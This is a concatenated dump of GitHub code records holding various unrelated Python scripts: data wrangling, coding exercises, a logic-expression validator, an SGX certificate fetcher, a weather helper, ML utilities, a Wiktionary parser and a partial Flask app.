attributes)\n","repo_name":"fletcherd3/Scott-Base-Seal-Monitoring-CNN-application-","sub_path":"scripts/segments_ai_upload.py","file_name":"segments_ai_upload.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"11451108655","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\ndf1 = pd.read_csv('./data/geocoded_address_from.csv')\ndf2 = pd.read_csv('./data/geocoded_address_to.csv')\n\n\n# In[4]:\n\n\ndf1 = df1.rename({'latitude':'from_latitude'},axis=1)\ndf1 = df1.rename({'longitude':'from_longitude'},axis=1)\n\ndf2= df2.rename({'latitude':'to_latitude'},axis=1)\ndf2 = df2.rename({'longitude':'to_longitude'},axis=1)\n\n\n# In[12]:\n\n\ndf2['Unnamed: 0']\n\n\n# In[13]:\n\n\ndf2 = df2.drop(df2.columns.difference(['Unnamed: 0','to_latitude','to_longitude']), 1, inplace=True)\n\n\n# In[16]:\n\n\ndf3 = pd.merge(df1,df2,on='Unnamed: 0',how='left')\n\n\n# In[17]:\n\n\ndf3\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"singapore19/team-7","sub_path":"combination.py","file_name":"combination.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3875250895","text":"# if set set(a) = set(b) = 0, then result is 1\nimport re\n\n\ndef solution(a: str, b:str):\n\n # change lower_characters\n a = a.lower()\n b = b.lower()\n\n a_set = []\n b_set = []\n for i in range(len(a)-1):\n if re.findall('[a-z]',a[i]) and re.findall('[a-z]', a[i+1]):\n a_set.append(a[i]+a[i+1])\n for j in range(len(b)-1):\n if re.findall('[a-z]', b[j]) and re.findall('[a-z]',b[j+1]):\n b_set.append(b[j]+b[j+1])\n #intersaction\n inter = []\n for i in a_set:\n if i in b_set:\n inter.append(i)\n b_set.remove(i)\n #union\n sum = a_set + b_set\n\n #union == 0 case\n if len(sum) == 0:\n return 65536\n # else\n return (int(len(inter) / len(sum) * 65536))\n\na = \"FRANCE\"\nb = \"FRENCH\"\na2 = \"handshake\"\nb2 = \"shake hands\"\na3 = \"aa1+aa2\"\nb3 = \"AAAA12\"\na4 = \"E=M*C^2\"\nb4 = \"e=m*c^2\"\nprint (solution(a3,b3))\n","repo_name":"smartx-jshan/Coding_Practice","sub_path":"coding_interview/B5.py","file_name":"B5.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23270723943","text":"class Validator(object):\n\n def __init__(self, operators, characters):\n self.operators = operators\n self.characters = characters\n\n def validate(self, ex):\n ## & - conjunction,\n ## | - alternative,\n ## ^ - xor,\n ## ~ - negation,\n ## > - implication,\n ## = - equivalence\n ## * - nand\n ex = ex.strip()\n last = ''\n var = 0\n\n # checks if there are: spaces between variables, invalid characters\n for i in ex:\n if i in self.characters:\n if last == ' ' and var == 1:\n raise ValueError(\"invalid variables sequence\")\n var = 1\n\n elif i in self.operators.keys():\n var = 0\n\n elif i not in \"()\" + ' ':\n raise ValueError(\"invalid character\")\n\n last = i\n\n ex = \"\".join(ex.split())\n\n # simple enum\n NUMBER, LETTER, OPERATOR, L_BRACKET, R_BRACKET = range(0, 5)\n\n # checks grammar, brackets and variables' names\n flag = 0\n prev = None\n bracket_stack = []\n\n for i in ex:\n if i in self.characters:\n if prev in [R_BRACKET]: raise ValueError(\"incorrect brackets\")\n\n if prev in [NUMBER] and flag == 0:\n raise ValueError(\"variable starting with a number\")\n\n if i.isnumeric():\n if prev in [None, OPERATOR, L_BRACKET, R_BRACKET]:\n if int(i) not in [0, 1]:\n raise ValueError(\"variable starting with a number\")\n\n if prev == LETTER:\n flag = 1\n prev = NUMBER\n\n else:\n flag = 0\n prev = LETTER\n\n elif i in self.operators.keys():\n if prev in [None, OPERATOR, L_BRACKET] and i != '~':\n raise ValueError(\"binary operator used as an unary\")\n\n if prev in [R_BRACKET, LETTER, NUMBER] and i == '~':\n raise ValueError(\"unary operator used as a binary\")\n prev = OPERATOR\n\n elif i == '(':\n if prev in [LETTER, NUMBER, R_BRACKET]:\n raise ValueError(\"incorrect brackets\")\n prev = L_BRACKET\n bracket_stack.append(L_BRACKET)\n\n elif i == ')':\n if len(bracket_stack) == 0:\n raise ValueError(\"incompatible brackets\")\n bracket_stack.pop()\n\n if prev in [OPERATOR, L_BRACKET]:\n raise ValueError(\"incorrect brackets\")\n prev = R_BRACKET\n\n if prev == OPERATOR:\n raise ValueError(\"operator shouldn't be at the end\")\n\n if len(bracket_stack) > 0:\n raise ValueError(\"incompatible brackets\")\n\n return ex\n","repo_name":"pulnara/Expression-simplifier","sub_path":"validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4162034568","text":"from readData import ReadMCData\nimport sys\nimport numpy as np\nimport networkx as nx\n\n\"\"\"\nPython script used for converting graphs into formatted input to powergnn package\n\"\"\"\n\ndef getedgeCount(X,index):\n count = 0;\n for each in X[index]:\n if each > 0:\n count = count+1\n\n return count\n\ndef ToGNNinputNumOfGraph(file,numOfGraphs):\n file.write(str(numOfGraphs)+\"\\n\")\n\ndef ToGNNinput100(file,labelfile,wrc,X, T): \n\n G = nx.from_numpy_matrix(X)\n\n\n numOfNodesHavingEdge = len(G.nodes)\n\n labelOfThisG = labelfile.readline()\n if len(G.edges) != 0:\n file.write(str(numOfNodesHavingEdge)+' '+labelOfThisG)\n wrc = wrc+1\n for i in range(numOfNodesHavingEdge):\n edgeCount = getedgeCount(X,i)\n tmpAry = X[i]\n connectedTo = np.where( tmpAry == 1)[0]\n file.write(\"0 \"+str(edgeCount)+' ')#write node tag, edgecount\n wrc = wrc + 1\n for j in range(edgeCount):\n file.write(str(connectedTo[j]) + ' ')\n\n file.write('\\n')\n #print(wrc)\n\n return wrc\n\n\nT = 0 #pre calculated\n\nreader = ReadMCData('04', 18200, '../mcDataset/csvsReal2/') # name , MC count, path\nreader.readX()\n\n# reader.writeXcsv()\nprint(\"current Threshold: \" + str(T) + \"\\n\")\n\n\n# write each graph to json, create a dataset for graph2vec\n#labelFile = open('../dataset/csvs/labelAll.csv', \"r\")\nlabelFile = open('../mcDataset/csvsReal2/labelAll.csv','r')\ngnnInFile = open('./gnnIn.txt', \"w+\")\n\n\nnumOfEmptyG=0\nfor i in range(len(reader.X)):\n reader.X[i] = np.array(reader.X[i])\n reader.X[i] = reader.X[i].astype(np.float)\n reader.X[i] = (reader.X[i] > T).astype(int)\n top = np.max(reader.X[i])\n if top == 0:\n numOfEmptyG = numOfEmptyG + 1\n\nwriterowcount = 1\nfor i in range(len(reader.X)):\n if i == 0:\n ToGNNinputNumOfGraph(gnnInFile, len(reader.X)-numOfEmptyG)\n\n writerowcount = ToGNNinput100(gnnInFile, labelFile,writerowcount, reader.X[i],T)\n print(\"finished graph :\"+str(i))\nprint(\"wote rows: \"+str(writerowcount))\nlabelFile.close()\ngnnInFile.close()\n\n\nprint(\"done\")","repo_name":"XiaominWuFred/WGEVIA","sub_path":"MCSWE1.1origin/powergnn/topgnn.py","file_name":"topgnn.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"32449471851","text":"#!/usr/bin/python3\n\nimport urllib.request\n\nINTEL_CACHE_DIR = \"/var/cache/intel-sgx/\"\nCSV_FILE = INTEL_CACHE_DIR + \"pckid_retrieval.csv\"\nFMSPC_FILE = INTEL_CACHE_DIR + \"fmspc.txt\"\nPCK_FILE = INTEL_CACHE_DIR + \"pck.crt\"\n\nCSV = open(CSV_FILE).read().split(\",\")\nurl = f\"https://api.trustedservices.intel.com/sgx/certification/v4/pckcert?encrypted_ppid={CSV[0]}&cpusvn={CSV[2]}&pcesvn={CSV[3]}&pceid={CSV[1]}\"\n\nresponse = urllib.request.urlopen(url)\nfmspc = response.getheader(\"SGX-FMSPC\")\npck = response.read()\n\nopen(FMSPC_FILE, \"w\").write(fmspc)\nopen(PCK_FILE, \"wb\").write(pck)\n","repo_name":"rjzak/sgx-enarx-lab-container","sub_path":"get_fmspc.py","file_name":"get_fmspc.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8438136417","text":"products = [\n (\"Product1\", 10),\n (\"Product2\", 9),\n (\"Product3\", 12),\n]\n\n\nprices = []\nfor product, price in products:\n prices.append(price)\n\nproduct_prices = map(lambda product: product[1], products)\nprice_only = []\nfor price in product_prices:\n price_only.append(price)\n print(price)\n\nprint(prices)\n","repo_name":"To-heeb/python-prime","sub_path":"loop/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16344509174","text":"from flask import render_template, request, redirect, url_for, jsonify\nimport requests\nimport json\n\n\nclass Meteo:\n\n\n def __init__(self):\n self.city = None\n self.temperature = None\n self.description = None\n self.wind = None\n self.humidity = None\n self.icon = None\n\n def crear_ciudad(self , city , temperature , description ,wind , humidity , icon):\n self.city = city\n self.temperature = temperature\n self.description = description\n self.wind = wind\n self.humidity = humidity\n self.icon = icon\n \n \n def get_weather(self,city):\n url = 'http://api.openweathermap.org/data/2.5/weather?q={}' \\\n '&units=metric&appid=56f9b5c11b1436358ed721716d4e942f'\n \n r = requests.get(url.format(city)).json()\n weather = {\n 'city': city,\n 'temperature': r['main']['temp'],\n 'description': r['weather'][0]['description'],\n 'icon': r['weather'][0]['icon'],\n 'wind': r['wind']['speed'],\n 'humidity' : r['main']['humidity'],\n }\n return weather\n\n\n\n def statusTiempo(self,weather):\n status=None\n tmp = weather[\"temperature\"]\n viento = weather[\"wind\"]\n hume = weather[\"humidity\"]\n \n \n if tmp <= 2 and viento > 40 and hume > 50:\n status = ' Las probabilidades de que las pistas esten cerradas o no se pueda practicar deporte sin riesgos son muy altas'\n\n if tmp >0 and tmp < 15 and viento > 0 and viento < 10 and hume > 20 and hume < 100:\n status = ' Las condiciones son idoneas. Disfruta del dia! '\n \n \n if tmp > 12 and tmp < 25 and viento < 5:\n status = 'Las condiciones son favorables , pero la nieve estara blanda'\n \n if tmp == None and viento == None and hume == None and wind == None:\n status = ' El servicio de estatus personalizado no esta funcionando. Espere unos minutos. '\n \n \n if tmp > -5 and tmp < 5 and viento > 30 :\n status = 'El viento en zonas altas puede ser fuerte. Las rachas pueden superar los 60km/h. Recomendado no subir a zonas altas.'\n \n if tmp < -5 and viento > 10 and viento < 30 and hume < 50 :\n status = ' Evite zonas expuestas , la temperatura podria ser muy baja y las pistas podrian estar congeladas '\n \n if tmp >0 and tmp < 10 and viento > 0 and viento < 60 and hume > 0 and hume < 100:\n status = ' Evite zonas altas y expuestas , las condiciones son favorables en zonas bajas pero en zonas altas el viento podria aumentar considerablemente ' \n \n if tmp < 0 and viento < 10 and hume > 50:\n status = ' Posibles heladas al principio de la jornada. Temperaturas bajas en zonas expuestas. Viento : Flojo. Condiciones bastante buenas para la practica de deporte. '\n return status\n \n \n def getCity(self):\n return self.city\n\n def getHumidity(self):\n return self.humidity\n\n def getTemperatura(self):\n return self.temperature\n\n def getWind(self):\n return self.wind\n\n def getDescripcion(self):\n return self.description\n","repo_name":"vaderrama/Proyecto-IV","sub_path":"app/Meteo.py","file_name":"Meteo.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"37952386099","text":"class BreakException(Exception): pass\r\n\r\ndef make_primes(to):\r\n result = []\r\n n = 2\r\n while len(result) < to:\r\n for i in range(2, int(n**0.5 + 1)):\r\n if n%i == 0: break\r\n else:\r\n result.append(n)\r\n n += 1\r\n return result\r\n \r\nprimes = make_primes(10000)\r\n\r\nfor num in (n for n in range(3, 10**6, 2) if n not in primes):\r\n try:\r\n for prime in primes:\r\n if prime + 2 > num: break\r\n i = Sum = 1\r\n while Sum < num:\r\n Sum = prime + 2*(i**2)\r\n i += 1\r\n assert not Sum == num\r\n except AssertionError:\r\n continue\r\n else:\r\n print (\"%d is the smallest odd composite that cannot be written as the sum of a prime and twice a square\" % num)\r\n break\r\n \r\n","repo_name":"bodik10/EulerSolving","sub_path":"euler 046.py","file_name":"euler 046.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72641613676","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nfrom skimage.io import imread\n\nimport os\nprint(os.listdir('../input'))\nsegmentations = pd.read_csv('../input/train_ship_segmentations.csv')\nsegmentations.head()\nprint('Number of images')\nprint(f'- containing ships : {len(segmentations[segmentations.EncodedPixels.isna() == False].ImageId.unique())}')\nprint(f'- not containing ships : {len(segmentations[segmentations.EncodedPixels.isna()].ImageId.unique())}')\nimage_ids = segmentations[segmentations.EncodedPixels.isna() == False].sample(6, random_state=123).ImageId\nimage_ids\nimage_id = image_ids.iat[0]\nimg = imread(f'../input/train/{image_id}')\nprint(f'Image id : {image_id}')\nprint(f'Image shape: {img.shape}')\n\nplt.axis('off')\nplt.imshow(img)\nplt.show()\ndef rle_decode(encoded_pixels, shape):\n s = encoded_pixels.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[::2], s[1::2])]\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0] * shape[1], dtype=np.uint8)\n for start, end in zip(starts, ends):\n img[start:end] = 1\n return img.reshape(shape).T\nfig, axes = plt.subplots(3, 4, figsize=(16, 12))\n\nfor i, image_id in enumerate(image_ids):\n img = imread(f'../input/train/{image_id}')\n mask_shape = img.shape[:-1]\n mask = np.zeros(mask_shape)\n \n encoded_pixels_list = segmentations[segmentations.ImageId == image_id].EncodedPixels.tolist()\n for encoded_pixels in encoded_pixels_list:\n mask += rle_decode(encoded_pixels, mask_shape)\n \n row = i // 2\n col = i * 2 % 4\n axes[row][col].axis('off')\n axes[row][col+1].axis('off')\n axes[row][col].imshow(img)\n axes[row][col+1].imshow(mask)\n \nplt.tight_layout(h_pad=0, w_pad=0)\nplt.show()\nimage_ids = segmentations[segmentations.EncodedPixels.isna()].sample(8, random_state=123).ImageId\nimage_ids\nfig, axes = plt.subplots(2, 4, figsize=(16, 8))\n\nfor i, image_id in enumerate(image_ids):\n img = imread(f'../input/train/{image_id}')\n \n row = i // 4\n col = i % 4\n \n axes[row][col].axis('off')\n axes[row][col].imshow(img)\n \nplt.tight_layout(h_pad=0, w_pad=0)\nplt.show()\n","repo_name":"aorursy/new-nb-7","sub_path":"shin2ro_airbus-ship-detection-eda.py","file_name":"shin2ro_airbus-ship-detection-eda.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"36399540633","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.preprocessing import LabelEncoder\n\nplt.style.use('ggplot')\n\ndef plot_datapoints(data, dim_x, dim_y, classes=None, save_folder=None, name=None):\n \"\"\"\n Displays a scatter plot of the data given in argument.\n data: the data to be plotted. Datapoints should be given as rows and features\n as columns.\n dim_x: the column number (feature number) to be used as x-axis.\n dim_y: the column number (feature number) to be used as y-axis.\n classes: is an array which size equals the number of rows of 'data' and which\n associate each datapoint to its corresponding class.\n \"\"\"\n n_datapoints, n_features = data.shape\n\n fig = plt.figure(figsize=(15,15))\n color_classes = LabelEncoder().fit_transform(classes)\n plt.scatter(data[:,dim_x], data[:,dim_y], c=color_classes, s=40., alpha=0.65,\n linewidths=1.5, marker='D')\n\n plt.grid(True)\n plt.xlabel('Dimension %s' % dim_x)\n plt.ylabel('Dimension %s' % dim_y)\n\n if save_folder is None or name is None:\n plt.show()\n else:\n assert save_folder is not None and name is not None, 'Whether plot folder or' \\\n 'filename is missing.'\n path = os.path.join(os.getcwd(), save_folder)\n if not os.path.exists(path):\n os.makedirs(path)\n file_path = os.path.join(path, '%s.png' % name)\n plt.savefig(file_path)\n\n\ndef plot_error_rate(errors, legend):\n dim_subspace_max, n_methods = errors.shape\n\n fig = plt.figure(figsize=(10,10))\n x_range = range(1, dim_subspace_max+1)\n for method in range(n_methods):\n plt.plot(x_range, errors[:,method], label=legend[method], linewidth=3, alpha=0.8)\n\n plt.xlim([0, dim_subspace_max+1])\n plt.ylim([0,1])\n\n plt.xlabel('Number of dimensions used by KNN')\n plt.ylabel('Error rate')\n plt.legend(loc='best')\n\n plt.savefig('./perf_results/result.png')\n plt.show()\n","repo_name":"RomainSabathe/cw_dimension_reduction","sub_path":"plot_toolbox.py","file_name":"plot_toolbox.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4243589910","text":"from typing import List, Tuple\n\nimport numpy as np\n\n\ndef convert_x_list_to_array(x_list: List) -> np.ndarray:\n \"\"\"\n Converts list representation of features to array representation\n :param x_list: A list of (n_points x n_dims) numpy arrays ordered from lowest to highest fidelity\n :return: An array of all features with the zero-based fidelity index appended as the last column\n \"\"\"\n # First check everything is a 2d array\n if not np.all([x.ndim == 2 for x in x_list]):\n raise ValueError(\"All x arrays must have 2 dimensions\")\n\n x_array = np.concatenate(x_list, axis=0)\n indices = []\n for i, x in enumerate(x_list):\n indices.append(i * np.ones((len(x), 1)))\n\n x_with_index = np.concatenate((x_array, np.concatenate(indices)), axis=1)\n return x_with_index\n\n\ndef convert_y_list_to_array(y_list: List) -> np.ndarray:\n \"\"\"\n Converts list representation of outputs to array representation\n :param y_list: A list of (n_points x n_outputs) numpy arrays representing the outputs\n ordered from lowest to highest fidelity\n :return: An array of all outputs\n \"\"\"\n if not np.all([y.ndim == 2 for y in y_list]):\n raise ValueError(\"All y arrays must have 2 dimensions\")\n return np.concatenate(y_list, axis=0)\n\n\ndef convert_xy_lists_to_arrays(x_list: List, y_list: List) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Converts list representation of targets to array representation\n :param x_list: A list of (n_points x n_dims) numpy arrays ordered from lowest to highest fidelity\n :param y_list: A list of (n_points x n_outputs) numpy arrays representing the outputs\n ordered from lowest to highest fidelity\n :return: Tuple of (x_array, y_array) where\n x_array contains all inputs across all fidelities with the fidelity index appended as the last column\n and y_array contains all outputs across all fidelities.\n \"\"\"\n\n if len(x_list) != len(y_list):\n raise ValueError(\"Different number of fidelities between x and y\")\n\n # Check same number of points in each fidelity\n n_points_x = np.array([x.shape[0] for x in x_list])\n n_points_y = np.array([y.shape[0] for y in y_list])\n if not np.all(n_points_x == n_points_y):\n raise ValueError(\"Different number of points in x and y at the same fidelity\")\n\n return convert_x_list_to_array(x_list), convert_y_list_to_array(y_list)\n","repo_name":"EmuKit/emukit","sub_path":"emukit/multi_fidelity/convert_lists_to_array.py","file_name":"convert_lists_to_array.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":544,"dataset":"github-code","pt":"73"} +{"seq_id":"74602141995","text":"from algos.agent import Agent\nfrom algos.ppo import PPOAgent\nfrom algos.sac import SACAgent\nfrom algos.mf_trainer import Trainer\nfrom scripts.arguments import *\nfrom envs.babyai.utils.obs_preprocessor import make_obs_preprocessor\nfrom scripts.test_generalization import make_log_fn\nfrom algos.data_collector import DataCollector\nfrom utils.rollout import rollout\n\nimport shutil\nfrom logger import logger\nfrom utils.utils import set_seed\nfrom envs.babyai.levels.iclr19_levels import *\nfrom envs.babyai.levels.envdist import EnvDist\nimport pathlib\nimport joblib\nimport os\n\nfrom train_model import *\nfrom utils.agent_loader import *\n\n\ndef load_saved_agent(args):\n return args, load_agent_iteration(args.saved_iteration)\n\n\ndef run_distillation(args):\n args, saved_agent = load_saved_agent(args)\n original_args = saved_agent.args\n\n if not hasattr(args, 'noise'):\n args.noise = False\n exp_name = args.prefix\n set_seed(args.seed)\n feedback_list = get_feedback_list(args)\n env = make_env(args, feedback_list)\n args.feedback_list = feedback_list\n obs_preprocessor = make_obs_preprocessor(feedback_list)\n\n # Either we need an existing dataset, or we need to collect\n assert (args.buffer_path or (args.collect_policy is not None) or\n (args.rl_teacher is not None and args.collect_with_rl_policy) or\n (args.distill_teacher is not None and args.collect_with_distill_policy))\n # We can't collect with both policies\n assert not (args.collect_with_rl_policy and args.collect_with_distill_policy)\n\n\n log_policy = None\n if args.rl_teacher is not None:\n rl_agent = create_agent(args.rl_policy, args.rl_teacher, env, args,\n obs_preprocessor)\n log_policy = rl_agent\n else:\n rl_agent = None\n if args.distill_teacher is not None:\n distilling_agent = create_agent(args.distill_policy, args.distill_teacher, env, args, obs_preprocessor)\n log_policy = distilling_agent\n else:\n distilling_agent = None\n if args.relabel_teacher is not None:\n relabel_policy = create_agent(args.relabel_policy, args.relabel_teacher, env, args, obs_preprocessor)\n else:\n relabel_policy = None\n\n if args.collect_with_rl_policy:\n collect_policy = rl_agent\n args.collect_teacher = args.rl_teacher\n elif args.collect_with_distill_policy:\n collect_policy = distilling_agent\n args.collect_teacher = args.distill_teacher\n elif args.collect_teacher is not None:\n collect_policy = create_agent(args.collect_policy, args.collect_teacher, env, args, obs_preprocessor)\n if log_policy is None:\n log_policy = collect_policy\n else:\n collect_policy = None\n\n exp_dir = os.getcwd() + '/logs/' + exp_name\n args.exp_dir = exp_dir\n is_debug = args.prefix == 'DEBUG'\n configure_logger(args, exp_dir, args.start_itr, is_debug)\n\n if args.eval_envs is not None:\n eval_policy(log_policy, env, args, exp_dir)\n return\n\n envs = [env.copy() for _ in range(args.num_envs)]\n for i, new_env in enumerate(envs):\n new_env.seed(i+100)\n new_env.set_task()\n new_env.reset()\n if collect_policy is None:\n sampler = None\n else:\n sampler = DataCollector(collect_policy, envs, args)\n\n buffer_name = exp_dir if args.buffer_path is None else args.buffer_path\n args.buffer_name = buffer_name\n num_rollouts = 1 if is_debug else args.num_rollouts\n log_fn = make_log_fn(env, args, 0, exp_dir, log_policy, hide_instrs=args.hide_instrs, seed=args.seed+1000,\n stochastic=True, num_rollouts=num_rollouts, policy_name=exp_name,\n env_name=str(args.level),\n log_every=args.log_interval)\n\n trainer = Trainer(\n args=args,\n collect_policy=collect_policy,\n rl_policy=rl_agent,\n distill_policy=distilling_agent,\n relabel_policy=relabel_policy,\n sampler=sampler,\n env=deepcopy(env),\n obs_preprocessor=obs_preprocessor,\n log_dict=log_dict,\n log_fn=log_fn,\n )\n trainer.train()\n\n\nif __name__ == '__main__':\n parser = DistillArgumentParser()\n args = parser.parse_args()\n run_distillation(args)\n\n","repo_name":"Safe-RL-Team/advice-distillation-code","sub_path":"scripts/distill_model.py","file_name":"distill_model.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"35320500780","text":"#!/usr/bin/python3\n\"\"\"Take Github credentials and return user id\"\"\"\nif __name__ == \"__main__\":\n import requests\n import sys\n username = sys.argv[1]\n pwd = sys.argv[2]\n response = \\\n requests.get('https://api.github.com/user', auth=(username, pwd))\n data = response.json()\n print(data.get('id'))\n","repo_name":"Semhal22/alx-higher_level_programming","sub_path":"0x11-python-network_1/10-my_github.py","file_name":"10-my_github.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"18656026177","text":"from src.Regex import Regex\nfrom src.constants.regular_expressions import *\n\n\ndef language_code_of_dump_file(string):\n _language_code = Regex.findall(FIND_LANGUAGE_CODE_FOR_DUMP_REGEX, string)\n if len(_language_code) == 0:\n raise Exception(\"Could not find the language code for the wiktionary dump.\")\n elif len(_language_code) > 1:\n raise Exception(\"Found more than one language code even though only one was expected.\")\n return _language_code[0]\n\n\ndef dump_file_created_at(string):\n _created_at_string = Regex.findall(FIND_DATE_FROM_DUMP_FILE_NAME_REGEX, string)\n if len(_created_at_string) == 0:\n raise Exception(\"Could not find the timestamp in the filename.\")\n elif len(_created_at_string) > 1:\n raise Exception(\"Found more than one match where only one was expected.\")\n from datetime import datetime\n return datetime.strptime(_created_at_string[0], '%Y%m%d')\n\n\ndef pages(string):\n _pages = Regex.findall(FIND_ALL_PAGES_REGEX, string)\n if len(_pages) == 0:\n raise Exception(\"Could not find any pages.\")\n return _pages\n\n\ndef page(string):\n _match = Regex.search(FIND_ALL_PAGES_REGEX, string)\n _page = string[_match.regs[0][0] : _match.regs[0][1]]\n if len(_page) == 0:\n raise Exception(\"Could not find any page.\")\n return _page, _match.regs[0][0], _match.regs[0][1]\n\n\ndef namespace(string):\n _namespace = Regex.findall(FIND_NAMESPACE_REGEX, string)\n if len(_namespace) == 0:\n raise Exception(\"Could not find the namespace.\")\n elif len(_namespace) > 1:\n raise Exception(\"Found more than one namespace where only one was expected.\")\n return int(_namespace[0])\n\n\ndef page_title(string):\n _page_title = Regex.findall(FIND_PAGE_TITLE_REGEX, string)\n if len(_page_title) == 0:\n raise Exception(\"Could not find the page title.\")\n elif len(_page_title) > 1:\n raise Exception(\"Found more than one page title where only one was expected.\")\n return _page_title[0]\n\n\ndef page_id(string):\n _id = Regex.findall(FIND_PAGE_ID_REGEX, string)\n if len(_id) == 0:\n raise Exception(\"Could not find the page id.\")\n elif len(_id) > 1:\n raise Exception(\"Found more than one page id where only one was expected.\")\n return _id[0]\n\n\ndef page_redirect(string):\n _redirect = Regex.findall(FIND_PAGE_REDIRECT_REGEX, string)\n # Doesn't throw an exception if page has no redirect, few have them\n if len(_redirect) > 1:\n raise Exception(\"Found more than one page redirect where only one was expected.\")\n return _redirect[0] if len(_redirect) == 1 else None\n\n\ndef page_content(string):\n _content = Regex.findall(FIND_PAGE_CONTENT_REGEX, string)\n # Doesn't throw an exception if page has no content, some don't have a text tag\n if len(_content) > 1:\n raise Exception(\"Found more than one page content where only one was expected.\")\n return _content[0] if len(_content) == 1 else None\n\n\ndef page_language_sections(string):\n # Don't throw exception if nothing was found, some pages don't have sections -> it's rare tho\n return Regex.findall(FIND_ALL_PAGE_LANGUAGE_SECTIONS, string)\n\n\ndef part_of_speech_sections(regex, string):\n # Don't throw exception if nothing was found\n return Regex.findall(regex, string)\n","repo_name":"Goga-Barabadze/dictionary-parser-api","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"465847979","text":"try:\n arquivo = input(\"Informe o nome do arquivo: \")\n fhand = open(arquivo)\n for line in fhand:\n linha = str(line).strip()\n print(linha.upper())\n print(\"Arquivo lido com sucesso\")\nexcept FileNotFoundError:\n print(\"o arquivo não foi localizado, verifique o caminho informado\")\n\n\n","repo_name":"robsonpiere/ds-puc-ile-lista-python","sub_path":"Ex_7.1.py","file_name":"Ex_7.1.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"41308155637","text":"\"\"\"\n Exp7_2_DriveDistance -- RoseBot Experiment 7.2\n\n In an earlier experiment, we used a combination of speed and time to\n drive a certain distance. Using the encoders, we can me much more accurate.\n In this example, we will show you how to setup your robot to drive a certain\n distance regardless of the motor speed.\n\"\"\"\nimport rosebot.rosebot as rb\ndef main():\n board = rb.RoseBotConnection(ip_address='r03.wlan.rose-hulman.edu') # change the 'rXX' value\n motors = rb.RoseBotMotors(board)\n encoders = rb.RoseBotEncoder(board)\n button = rb.RoseBotDigitalInput(board, rb.RoseBotPhysicalConstants.PIN_BUTTON)\n while True:\n # wait for a button press to start driving.\n if button.read() == 0:\n motors.drive_distance(12, 150) # drive 12 inches at motor_power = 150\n\nmain()\n\n","repo_name":"Rosebotics/pymata-aio-examples","sub_path":"RoseBot/sparkfun_experiments/Exp7_2_DriveDistance.py","file_name":"Exp7_2_DriveDistance.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"17970186392","text":"# coding: utf-8\r\n# 主管通讯,即url调度\r\nfrom flask import Flask\r\nfrom flask import render_template, request, jsonify\r\nimport json\r\nimport os\r\nimport _thread\r\nimport time\r\n\r\nfrom user import User #user.py的内容\r\n\r\nfrom gevent.pywsgi import WSGIServer\r\nfrom geventwebsocket.handler import WebSocketHandler\r\n\r\n###########################################\r\n#copy于v0.3修改2版的main.py的前30行不重复内容\r\nfrom subfunction.change_file import alter_file, read_class_file\r\nfrom subfunction.set_ratio import training_set, writer_objfile\r\n\r\nif os.path.exists(\"user.log\"):#判断此文件是否存在 ,存在删除\r\n os.remove(\"user.log\")\r\nfp = open(\"user.log\",\"w\")\r\nfp.close()\r\n###########################################\r\n\r\n\r\nPATH=\"C:/Users/mail/Desktop/Xflask_demo/v1.0/test/\" \r\n\r\n\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['JSON_AS_ASCII'] = False\r\n\r\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\r\n\r\n@app.route('/')\r\ndef index(): \r\n '''\r\n 可以理解为登录。\r\n '''\r\n loginuser=User('test_user')\r\n return render_template('index.html',login_user=\"test_user\",user_room=round(loginuser.haveGb(),3))\r\n\r\ndef readLastLine(filepath): #已更新为0.3修改2版代码\r\n with open(filepath, 'r') as fp:\r\n lines = fp.readlines()\r\n if lines: \r\n last_line = lines[-1]\r\n 